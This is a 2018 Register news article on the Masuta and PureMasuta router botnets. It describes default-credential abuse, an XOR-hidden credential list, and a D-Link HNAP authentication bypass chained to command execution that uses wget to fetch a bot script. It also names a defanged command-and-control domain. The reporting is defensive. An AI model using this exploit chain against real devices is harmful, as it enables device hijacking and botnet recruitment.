Fresh botnet recruiting routers with weak credentials

With a special HNAP exploit just for D-Link kit

By Richard Chirgwin

Posted in Security, 24th January 2018 04:29 GMT

Security researchers believe the author of the Satori botnet is at it again, this time attacking routers to craft a botnet dubbed "Masuta".

The early-January Satori botnet attacked a Huawei router zero-day. Masuta also hits routers.

According to NewSky's analysis, the attack comes in two flavours. There's Masuta, which takes the standard IoT approach of tapping devices for default credentials (hidden by a single XOR by 0x22, inspired by Mirai); and there's the more sophisticated “PureMasuta” which exploits an old network administration bug.

That bug was spotted back in 2015, when Craig Heffner identified a bug in D-Link's Home Network Administration Protocol. That's what Pure Masuta tries to exploit.

NewSky wrote:

It is possible to craft a SOAP query which can bypass authentication by using hxxp://purenetworks.com/HNAP1/GetDeviceSettings. Also, it is feasible to run system commands (leading to arbitrary code execution) because of improper string handling. When both issues are combined, one can form a SOAP request which first bypasses authentication, and then causes arbitrary code execution.

Since the bug lets routers run anything after GetDeviceSettings, what PureMasuta's bot-herders do is run a wget to fetch and run a shell script, recruiting the device into its botnet.

If you have a vulnerable device – D-Link's AC300, for example – make sure you've got firmware newer than 2015.

NewSky's attribution of the botnet, to an entity they dub "Nexus Zeta", comes from the C&C URL nexusiotsolutions(dot)net, since this was the same URL as the Satori botnet used. ®

Sign up to our NewsletterGet IT in your inbox daily

2 Comments

More from The Register

Trend Micro AV nukes innocent Sharepoint code, admins despair

Servers fall over after JavaScript file trashed by mistake

North Korea's antivirus software whitelisted mystery malware

'SiliVaccine' uses ancient, stolen, Trend Micro AV engine and bad home-brew crypto

US senators get digging to find out the truth about FCC DDoS attack

And why serial self-promoter John McAfee is a security expert on Russian hacking

Russian malware harvesting Telegram Desktop creds, chats

Python programmer may have outed himself on YouTube

World's biggest DDoS-for-hire souk shuttered, masterminds cuffed

Webstresser.org taken down by Europol plod and chums

Russia to Apple: Kill Telegram crypto-chat – or the App Store gets it

We know you’re busy, Mr Cook, but please reply before we become … unpleasant

In World Cup Russia, our Wi-Fi networks will log on to you!

Researchers warn of shady hotspots in host cities

Patch out for 'ridiculous' Trend Micro command execution vuln

Password Manager, Maximum Security and Premium Security are all at risk

World's biggest DDoS attack record broken after just five days

Memcached attacks are going to be this year's thing

SAP's Business Client can own entire apps, DDOS them into dust

And that's the worst of ten patches awaiting lucky, lucky SAP admins